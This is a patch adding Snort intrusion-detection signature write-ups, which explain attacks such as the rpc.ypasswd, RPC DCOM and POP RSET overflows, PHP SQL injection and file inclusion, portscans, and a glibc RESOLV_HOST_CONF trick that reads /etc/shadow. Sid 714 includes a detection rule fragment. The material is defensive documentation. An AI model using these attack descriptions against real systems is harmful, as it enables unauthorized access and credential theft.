+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
--- /dev/null
+++ b/doc/signatures/122-18.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-18
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp decoy
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/396.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+396
+
+--
+
+Summary:
+This event is generated when an ICMP Destination Unreachable Fragmentation Needed datagram is detected on the network.  Gateway devices normally generate these ICMP messages when the destination network requires fragmentation before the datagram can be forwarded by a gateway.
+
+--
+
+Impact:
+This ICMP message will be generated when the destination network specified in the datagram requires fragmentation and the DF bit is set on the datagram.  This could be an indication of improperly configured network hosts.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000856.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000856
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "mail" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "mail" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2112.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+2112
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command RSET.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending a line feed character to a POP server via the RSET command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000923.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This detects traffic generated by a particular udp script installed on the serve
+r; this script is usually remotely installed via exploitable software.
+
+--
+Impact:
+The machine sending this traffic is potentially compromised.
+
+--
+Detailed Information:
+This rule detects traffic generated by a the "udp.pl" script installed on the se
+rver; this script is usually remotely installed via exploitable software.
+
+--
+Affected Systems:
+Any running vulnerable PHP programs.
+
+--
+Attack Scenarios:
+The udp.pl script is typically installed on a server through php fopen allowing 
+remote files to be downloaded/executed on the server side; files are normally ow
+ned by the web server user.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Examine the system in question for signs of a successful intrusion, including th
+e presence of a script named "udp.pl". If detected, restore the system from the 
+last known-good backup.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Sago Networks
+Dan Protich <dprotich@sagonet.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3250.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3250
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1008.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1008
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3207.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3207
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1416.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1416
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to a 
+broadcast address is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 162, tcp or udp.
+
+An attacker may attempt to send this request to determine if any devices
+are using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP Trap daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 162, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon on the responding IP addresses.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+--
--- /dev/null
+++ b/doc/signatures/2125.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2125
+
+--
+Summary:
+This event is generated when an attempt is made to escape the root directory of an FTP server. 
+
+--
+Impact:
+Information gathering possible system file disclosure.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running an FTP server vulnerable to an attack that allows the user to escape the FTP root directory.
+
+The attacker may be trying to gain information on the FTP implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+The ST FTP server from STSoft suffers from a vulnerability that can allow an attacker to access the filesystem on the host running the service.
+
+This event will also be generated by someone using Nessus to scan for this vulnerability.
+
+--
+Affected Systems:
+STSoft ST FTP Service 3.0
+
+--
+Attack Scenarios:
+The attacker is able to access the filesystem of the server using normal FTP commands.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the FTP implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the underlying operating system is fully patched.
+
+Check the host for signs of compromise.
+
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3420.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3420
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2423.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2423
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1068.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1068
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3323.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3323
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/262.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+262
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2497.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2497
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/714.txt
@@ -0,0 +1,90 @@
+Rule:  
+resolv_host_conf"; flow:to_server,established;
+content:"resolv_host_conf"; reference:arachnids,369;
+reference:url,www.securityfocus.com/bid/2181; classtype:attempted-admin;
+sid:714; rev:4;) 
+
+--
+
+Sid:
+
+714
+
+--
+
+Summary:
+
+The RESOLV_HOST_CONF variable is being manipulated on your Telnet host.
+
+--
+
+Impact:
+
+Elevated priviledges (file reads).
+
+--
+
+Detailed Information:
+
+The RESOLV_HOST_CONF variable, used by suid and sgid applications, isn't
+properly validated in some versions of glibc.  As a result, an attacker
+can use an suid or sgid root program to gain access to files they're not
+supposed to have.
+
+--
+
+Affected Systems:
+
+UNIX systems with unpatched glibc 2.1.x or 2.2.x implementations.
+
+--
+
+Attack Scenarios:
+
+Attacker sets the RESOLVE_HOST_CONF variable to the filename of any
+protected file (for example, /etc/shadow), and then runs an suid or sgid
+root program.  The contents of the protected file are then echoed to the
+console in a series of error messages.
+
+--
+
+Ease of Attack:
+
+Simple.
+
+--
+
+False Positives:
+
+None known.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Install the latest vendor-supplied glibc implementation.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS369
+
+Bugtraq:
+http://www.securityfocus.com/bid/2181
+
+
+--
--- /dev/null
+++ b/doc/signatures/2041.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2041
+
+--
+Summary:
+The Extended Terminal Access Controller Access Control System (XTACACS) 
+is an authentication and authorization protocol derived from  CISCO 
+TACACS. It is used in TCP/IP networks where network servers authenticate
+clients from a master server.
+
+This event is generated when a failed login using XTACACS is observed.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to access 
+resources controlled by the XTACACS server.
+
+Multiple events from this rule may indicate the attempted enumeration of
+a valid user account using brute force methodology.
+
+--
+Detailed Information:
+When a user logs in to a server that uses XTACACS the server then makes 
+a request to a master server to determine the validity of the request. 
+The master server then verifies the login attempt and returns data 
+concerning that user which may include information regarding resources 
+the user is allowed access to in the form of an access list.
+
+--
+Affected Systems:
+All servers using XTACACS for authentication control.
+
+--
+Attack Scenarios:
+Regular user login method.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This rule may generate an event when a legitimate user supplies an
+incorrect password or username when logging in to a device.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+XTACACS servers should only authenticate to known hosts and firewall 
+rules should prevent access to XTACACS enabled servers from outside the 
+local area network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Information Library - Intel:
+http://www.intel.com/support/si/library/bi0414.htm
+
+The Internet Next Generation Project:
+http://ing.ctit.utwente.nl/WU5/D5.1/Technology/xtacacs/
+
+Xtacacs Home:
+http://www.netplex-tech.com/software/xtacacsd/
+
+--
--- /dev/null
+++ b/doc/signatures/2713.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2713
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_load
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000854.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000854
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "ListMessenger" application running on a webserver. Access to the file "listmessenger.php" using a remote file being passed as the "lm_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lm_path" parameter in the "listmessenger.php" script used by the "ListMessenger" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ListMessenger
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
